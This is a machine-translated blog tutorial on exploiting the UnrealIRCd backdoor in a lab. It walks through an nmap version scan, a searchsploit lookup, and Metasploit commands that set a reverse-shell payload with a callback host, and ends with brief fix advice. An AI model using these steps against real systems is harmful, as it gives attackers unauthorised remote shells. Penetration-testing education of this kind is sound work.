当前位置:网站首页>6-25 Vulnerability Exploitation - irc Backdoor Exploitation
6-25 Vulnerability Exploitation - irc Backdoor Exploitation
2022-08-02 01:37:00 【Mountain Rabbit 1】

Introduction to irc
IRC is the English abbreviation of Internet Relay Chat, which is generally called Internet Relay Chat in Chinese.It is a network chat protocol pioneered by Finn Jarkko Oikarinen in 1988.After ten years of development, more than 60 countries in the world have provided IRC services. The working principle of IRC is very simple. You only need to run the client software on your PC, and then connect to an IRC through the Internet using the IRC protocol.on the server.At this time, you can chat through irc, which is characterized by very fast speed, almost no delay when chatting, and only occupies a small bandwidth resource, making the speed faster.All users can chat or whisper about a topic in a place called a "Channel".Each IRC user has a Nickname (nickname) to distinguish different users.
By default, the irc server runs on port 6667.

Detect target irc
Use nmap -sV -p 6667 IP address to detect the target irc version information
nmap -sV -p 6667 192.168.42.137
You can see that the target version information is quickly detected
msf exploits irc backdoor
Use searchsploit to find available POCs
searchsploit UnrealIRCd
You can see if there is any problem with the current software, we choose Backdoor Command Execution (Metasploit) here to use it
use exploit/unix/irc/unreal_ircd_3281_backdoorshow optionsset payload cmd/unix/reverseshow optionsset lhost 192.168.42.128exploitUse the module in msf for the irc backdoor connection to connect to the shell.

As you can see, the detection is completed, the session is established, and we can execute any command here
Repair Defense
1. Upgrade the software version
2. Replace other software
边栏推荐
- Some insights from 5 years of automated testing experience: UI automation must overcome these 10 pits
- Redis cluster mode
- dayjs时间处理库的基本使用
- 【Brush the title】Family robbery
- 浅谈国产ERP的“横纵竖”三向发展态势
- flv.js解析与使用
- HSDC和独立生成树相关
- bool Frame::PosInGrid(const cv::KeyPoint &kp, int &posX, int &posY)
- C语言实验七 二维数组程序设计
- 喜报 | AR 开启纺织产业新模式,ALVA Systems 再获殊荣!
猜你喜欢

typescript38-class的构造函数实例方法继承(implement)

C语言实验九 函数(一)

Local storage in Kubernetes

kubernetes之服务发现

5年自动化测试经验的一些感悟:做UI自动化一定要跨过这10个坑

Image fusion based on weighted 】 and pyramid image fusion with matlab code

typescript37-class的构造函数实例方法继承(extends)

C语言:打印整数二进制的奇数位和偶数位

IDEA版Postman插件Restful Fast Request,细节到位,功能好用

S/4中究竟有多少个模块,你对这些模块了解多少
随机推荐
typescript35-class的构造函数
内部类、异常简单介绍(第十天)
Flex layout in detail
Flex布局详解
记录一次数组转集合出现错误的坑点,尽量使用包装类型数组进行转换
PHP直播源码实现简单弹幕效果的相关代码
第一次写对牛客的编程面试题:输入一个字符串,返回该字符串出现最多的字母
DCM 中间件家族迎来新成员
from origin ‘null‘ has been blocked by CORS policy Cross origin requests are only supported for
Detailed explanation of fastjson
【刷题篇】打家劫舍
喜报 | AR 开启纺织产业新模式,ALVA Systems 再获殊荣!
电子制造仓储条码管理系统解决方案
力扣 1374. 生成每种字符都是奇数个的字符串
canal实现mysql数据同步
Why is on-chain governance so important, and how will Polkadot Gov 2.0 lead the development of on-chain governance?
理解分布式系统中的缓存架构(下)
Flink_CDC搭建及简单使用
bool Frame::PosInGrid(const cv::KeyPoint &kp, int &posX, int &posY)
Redis cluster mode